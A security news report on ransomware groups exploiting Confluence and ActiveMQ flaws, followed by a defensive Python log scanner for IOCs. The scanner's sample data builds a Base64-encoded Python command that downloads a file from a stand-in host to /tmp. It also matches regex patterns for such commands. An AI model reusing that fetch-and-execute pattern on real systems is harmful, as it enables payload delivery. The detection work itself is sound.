Critical Confluence and ActiveMQ Vulnerabilities Exploited by Ransomware Groups

Multiple ransomware groups are exploiting critical vulnerabilities in Atlassian Confluence and Apache ActiveMQ, as confirmed by cybersecurity firms including Rapid7, Arctic Wolf Labs, and Huntress. Rapid7 detected the exploitation of CVE-2023-22518 and CVE-2023-22515 in customer environments, leading to Cerber ransomware deployment. These vulnerabilities allow unauthorized creation of Confluence administrator accounts, compromising confidentiality, integrity, and availability. Atlassian updated its advisory on November 6 and raised the CVSS score to 10.0, the maximum severity, citing active exploitation and ransomware use.

The attack chain involves exploiting vulnerable Confluence servers to fetch and execute ransomware payloads. GreyNoise data shows these attacks originate from IP addresses in France, Hong Kong, and Russia. Arctic Wolf Labs reported that a severe remote code execution flaw in Apache ActiveMQ (CVE-2023-46604) is being used to deliver SparkRAT and a ransomware variant resembling TellYouThePass.

Huntress confirmed exploitation of the Atlassian flaw since November 3, leading to Cerber ransomware infections. The speed of these campaigns, from patch release to exploitation, highlights how quickly adversaries move to monetize vulnerabilities.

Confluence is targeted because of its widespread use as a collaboration platform, which makes it a prime source of sensitive information and a foothold for spreading malware. Rapid7’s Managed Detection and Response (MDR) service detected the exploitation of these flaws on both Windows and Linux platforms, with attackers using Base64-encoded Python instructions to download malicious payloads.

Atlassian has released fixed versions of Confluence to address these vulnerabilities. Atlassian Cloud sites are not affected, but administrators of vulnerable self-hosted sites are urged to update immediately. If updates are not feasible, Atlassian recommends interim risk mitigation measures. The firm also provided Indicators of Compromise (IOCs), including IP addresses, domains, file hashes, and ransom notes, to assist in identifying and responding to these threats.
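The two defender-side details above, Base64-encoded Python download commands observed by MDR and the IOC lists (IPs, domains, file hashes) published for hunting, lend themselves to a small triage script. The following is an added example, not code from Atlassian, Rapid7 or the article: it scans log lines for IOC matches, spots `python -c` command lines that decode a Base64 blob, decodes the blob so an analyst can see what it would have run, and checks the decoded text against the domain list. All indicator values and log lines are constructed placeholders (TEST-NET addresses, a `.invalid` hostname, a repeated-byte hash); substitute the published IOCs before use.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Iterable

# Constructed placeholder indicators for this example. They are NOT the real
# IOCs from Atlassian's or Rapid7's advisories; load the published lists instead.
IOC_IPS = {"198.51.100.23", "203.0.113.77"}
IOC_DOMAINS = {"payload-host.invalid"}
IOC_SHA256 = {"deadbeef" * 8}

IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
# Matches: python -c "... b64decode('<blob>') ...", i.e. a Base64-encoded Python command line.
B64_PYTHON = re.compile(
    r"python[\d.]*\s+-c\b.*?b64decode\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]",
    re.IGNORECASE,
)


@dataclass
class Finding:
    line_no: int
    reason: str   # ioc_ip | ioc_domain | ioc_hash | base64_python
    detail: str   # the matched indicator, or a preview of the decoded command


def decode_b64(blob: str) -> str:
    """Decode a Base64 blob for analyst review; return '' if it is not valid Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def scan_line(line_no: int, line: str) -> list[Finding]:
    """Return every IOC or encoded-Python hit found in one log line."""
    hits: list[Finding] = []
    lowered = line.lower()
    for ip in IPV4.findall(line):          # whole dotted quads only, no substring hits
        if ip in IOC_IPS:
            hits.append(Finding(line_no, "ioc_ip", ip))
    for dom in IOC_DOMAINS:
        if dom in lowered:
            hits.append(Finding(line_no, "ioc_domain", dom))
    for h in IOC_SHA256:
        if h in lowered:
            hits.append(Finding(line_no, "ioc_hash", h))
    m = B64_PYTHON.search(line)
    if m:
        decoded = decode_b64(m.group(1))
        hits.append(Finding(line_no, "base64_python", decoded[:120]))
        # The raw line hides the destination inside Base64; re-check the decoded text.
        for dom in IOC_DOMAINS:
            if dom in decoded.lower():
                hits.append(Finding(line_no, "ioc_domain", dom))
    return hits


def scan_log(lines: Iterable[str]) -> list[Finding]:
    findings: list[Finding] = []
    for n, line in enumerate(lines, start=1):
        findings.extend(scan_line(n, line.rstrip("\n")))
    return findings


# Constructed sample events (not real captures): an access-log request from a
# placeholder IOC IP, a benign request, a process event carrying a Base64-encoded
# Python downloader, and a file event whose hash is on the placeholder IOC list.
_STAGER = "import urllib.request as u;u.urlretrieve('http://payload-host.invalid/stage','/tmp/stage')"
_BLOB = base64.b64encode(_STAGER.encode()).decode()
_CMD = "python3 -c \"import base64;exec(base64.b64decode('" + _BLOB + "'))\""
SAMPLE_LOG = [
    '198.51.100.23 - - [06/Nov/2023:10:01:22 +0000] "POST /rest/api/content HTTP/1.1" 200 512',
    '192.0.2.10 - - [06/Nov/2023:10:01:30 +0000] "GET /dashboard.action HTTP/1.1" 200 2048',
    "2023-11-06T10:02:01Z host=conf01 cmd=" + _CMD,
    "2023-11-06T10:02:05Z host=conf01 file=/tmp/stage sha256=" + "deadbeef" * 8,
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}: {f.detail}")
```

Run as a script it prints one line per finding; the decoded-command preview is what lets an analyst confirm a fetch-and-execute stage without running anything. Keep the indicator sets in a separate file in production so the published lists can be refreshed without touching the scanner.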
